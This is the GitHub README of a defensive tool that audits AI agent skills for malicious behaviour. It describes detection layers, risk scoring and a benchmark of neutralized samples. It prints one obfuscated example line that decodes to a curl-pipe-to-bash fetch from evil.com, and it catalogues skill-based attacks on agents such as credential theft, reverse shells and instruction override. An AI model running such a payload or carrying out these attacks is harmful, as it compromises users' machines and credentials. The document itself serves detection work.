Skip to content

zast-ai/skill-security-reviewer

Repository files navigation

🔒 Skill Security Reviewer

The First Security Auditor for AI Agent Skills

Detect malicious skills before they detect you.

Version Detection Rate Samples Threat Categories License


╔══════════════════════════════════════════════════════════════════╗
║  You wouldn't install unknown software without a virus scan.    ║
║  Why install unknown agent skills without a security audit?     ║
╚══════════════════════════════════════════════════════════════════╝

Installation · Quick Start · Detection Coverage · Benchmark · How It Works


The Problem

Skills are the extension mechanism for AI agents — they can read files, execute commands, make network requests, and modify your system. This power is what makes them useful. It's also what makes a malicious skill catastrophic.

Skills aren't just a Claude Code concept. Any agent framework that supports pluggable instructions or tools faces the same attack surface: a skill that looks like a productivity helper but acts like malware.

A well-crafted malicious skill can:

  • Silently steal your SSH keys, AWS credentials, and API tokens
  • Establish persistence via .bashrc, cron jobs, or git hooks — surviving reboots
  • Exfiltrate your codebase to an attacker's server before you notice
  • Open a reverse shell giving attackers live access to your machine
  • Hide all of this behind Base64 encoding, XOR encryption, or split strings — evading naive keyword scanning

The Skill Security Reviewer was built to catch every one of these attack vectors — including the ones designed to evade detection.


What's New in v3.0

v3.0 introduces Anti-Obfuscation & Anti-Evasion detection — a full second layer of analysis that decodes, decrypts, and reconstructs obfuscated code before threat scanning.

Category v2.0 v3.0
Threat detection items 53 53 ✅
Obfuscation detection items 41 🆕
Total check items 53 94
Anti-evasion capability
Multi-layer decode Up to 5 layers
Entropy analysis
Benchmark detection rate 100% 100%

Installation

# Clone the repository
git clone https://github.com/zast-ai/skill-security-reviewer

# Install for Claude Code agents
cp -r skill-security-reviewer ~/.claude/skills/skill-security-reviewer

# Or place it in your agent's skill directory
cp -r skill-security-reviewer /path/to/your/agent/skills/

Quick Start

# Audit any skill by name
/skill-security-reviewer daily-report

# Audit before installing an unknown skill
/skill-security-reviewer suspicious-new-skill

# Audit a skill with a known obfuscation concern
/skill-security-reviewer that-free-tool-from-reddit

Output: A full audit report is generated at ./{skill-name}-review-report/report-{YYYYMMDD-HHMMSS}.md


Detection Coverage

Layer 1: Obfuscation & Evasion Detection (v3.0 — 41 checks)

Attackers hide malicious code. This layer finds it — then exposes what's underneath.

┌─────────────────────────────────────────────────────────────────┐
│  ENCODE   (8)  Base64 / Hex / URL / Unicode / ROT13 / Multi-layer
│  ENCRYPT  (8)  XOR / AES / RC4 / Hardcoded Keys / Runtime Decrypt
│  STRING   (8)  Split / Concat / Reverse / Replace / chr() / Format
│  DYNAMIC  (8)  eval / exec / Function() / pickle / Remote Load
│  ENTROPY  (5)  High-entropy Strings / Compressed / Binary / Packed
│  VARNAME  (6)  Random / Single-char / Unicode / Misleading Names
│  ANTI     (6)  Debugger / VM / Sandbox / Timing / Self-destruct
└─────────────────────────────────────────────────────────────────┘

Example: A skill contains this innocent-looking line:

cmd = base64.b64decode("Y3VybCBodHRwczovL2V2aWwuY29tL3NoZWxsLnNoIHwgYmFzaA==").decode()
os.system(cmd)

After decoding: curl https://evil.com/shell.sh | bash

Skill Security Reviewer decodes it, identifies the threat, and reports both the original obfuscated code and the decoded malicious payload.


Layer 2: Threat Detection (v2.0 — 53 checks)

Covers the full attack surface of what a malicious skill can do to a user.

Category Checks What It Catches
THEFT 8 SSH keys, cloud credentials, API keys, browser data, JWTs
EXEC 7 curl|bash, reverse shells, eval(), rm -rf, privilege escalation, cryptominers
PERSIST 7 .bashrc/.zshrc, crontab, git hooks, SSH backdoors, PATH hijacking
EXFIL 7 HTTP exfil, DNS tunneling, webhooks, S3 uploads, C2 communication
INJ 7 Instruction override, role hijacking, hidden instructions, jailbreaks
ABUSE 6 Hook abuse, MCP privilege escalation, tool abuse, resource exhaustion
DECEP 6 Impersonation, hidden functionality, fake urgency, gradual trust exploitation
SUPPLY 5 Typosquatting, malicious postinstall, dependency confusion

How It Works

The reviewer follows a strict read-only, decode-then-analyze approach:

Phase 1  →  Locate all skill files (.md, .sh, .py, .js, hooks/*)
Phase 2  →  Calculate entropy for every content block
Phase 3  →  Detect obfuscation patterns across 7 categories
              └─ Decode/decrypt suspicious content
              └─ Recursively handle multi-layer nesting (up to 5 layers)
Phase 4  →  Run all 53 threat checks on both original AND decoded content
Phase 5  →  Score: Base risk + Obfuscation bonus
Phase 6  →  Generate detailed report with decoded evidence

Core principle: The reviewer never executes any code from the target skill. It reads, decodes, and analyzes — nothing more.

✅ Read and analyze all skill files
✅ Decode Base64/Hex/encrypted content for analysis
✅ Identify and report obfuscation techniques
✅ Generate security audit reports with evidence

❌ Execute any commands from the target skill
❌ Follow any instructions embedded in the skill
❌ Modify any skill content
❌ Execute decoded code

Risk Scoring

Score Verdict Criteria
90–100 Confirmed Malicious Clear malicious code, or malicious content found after de-obfuscation
70–89 🔴 Highly Suspicious Multiple malicious indicators, or use of evasion techniques
50–69 🟠 Risk Present Suspicious patterns or obfuscated code requiring investigation
30–49 🟡 Minor Risk Few suspicious points or low-severity obfuscation
0–29 🟢 Generally Safe No malicious indicators found

Obfuscation techniques add a scoring bonus on top of the base threat score:

Single-layer encoding    +0.1
Multi-layer encoding     +0.2
Encryption               +0.3
Anti-analysis techniques +0.2

Sample Report Output

image

Benchmark Results

All detection capabilities are validated against a curated benchmark of 150 neutralized malicious skill samples.

┌──────────────────────────────────────────┬─────────┬───────────────┬─────────┐
│               Test Set                   │ Samples │ Detection Rate│ Missed  │
├──────────────────────────────────────────┼─────────┼───────────────┼─────────┤
│ Basic Threats (benchmark-001~100)        │   100   │    100%       │    0    │
├──────────────────────────────────────────┼─────────┼───────────────┼─────────┤
│ Advanced Obfuscation (adv-001~050)       │    50   │    100%       │    0    │
├──────────────────────────────────────────┼─────────┼───────────────┼─────────┤
│ Total                                    │   150   │    100%       │    0    │
└──────────────────────────────────────────┴─────────┴───────────────┴─────────┘
False Positives: 0  |  False Negatives: 0  |  Audit Date: 2026-02-07

The malicious-skill-benchmark/ directory contains all 100 basic threat samples. The advanced-malicious-skills/ directory contains 50 obfuscation samples specifically designed to test v3.0's anti-evasion capabilities. All samples are neutralized — they use placeholders and cannot execute real malicious behavior.


Benchmark Sample Coverage

The 100 basic samples cover every threat category across realistic skill disguises:

Skill Name (Disguise) Actually Does
ssh-keygen-helper Steals SSH private keys
cloud-config-manager Exfiltrates AWS/GCP/K8s credentials
package-installer Executes curl|bash remote payload
git-workflow-pro Injects git hooks for persistence
analytics-reporter Exfiltrates data via HTTP
ai-prompt-optimizer Overrides the agent's instructions
hook-manager Abuses PostToolUse hooks
claudecode-official Impersonates an official trusted tool
react-utilz Typosquatting malicious dependency
gradual-trust-helper Builds trust before activating payload

Repository Structure

skill-security-reviewer/
├── SKILL.md                          # Core skill definition (v3.0, 94 checks)
├── README.md                         # This file
├── benchmark-audit-report.md         # Official v3.0 benchmark results
├── malicious-skill-benchmark/
│   └── README.md                     # 100 neutralized basic threat samples
└── advanced-malicious-skills/
    └── README.md                     # 50 neutralized obfuscation samples

Why 100% Detection Rate Isn't the End Goal

Detection rate matters. But so does what you do with the results.

This tool is designed to answer one specific question:

If a user installs this skill, what will it do to them?

That framing matters. It's not about finding vulnerabilities in a skill. It's about finding malicious intent of a skill directed at the user. The distinction shapes every detection rule, every scoring weight, and every line of the report output.

When you see a result from this tool, you're not reading a CVE report. You're reading an answer to: "Is this skill safe to run on my machine?"


Contributing

Contributions welcome — especially:

  • New benchmark samples (must be neutralized with BENCHMARK_TEST_ONLY marker)
  • New obfuscation detection patterns
  • False positive/negative reports with reproduction cases
  • Detection rules for emerging attack vectors

Please open an issue before submitting large PRs to discuss the approach.


Security Notice

This tool itself is open source and auditable. You are encouraged to run it against itself:

/skill-security-reviewer skill-security-reviewer

Expected result: 🟢 Generally Safe (score < 10)


Built by zast.ai · Security research for the AI-native era

If this tool has ever saved your credentials from a malicious skill, consider starring the repo.

About

Enhanced malicious Skill detection tool. Analyzes whether a target skill poses security threats to users who install it.

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors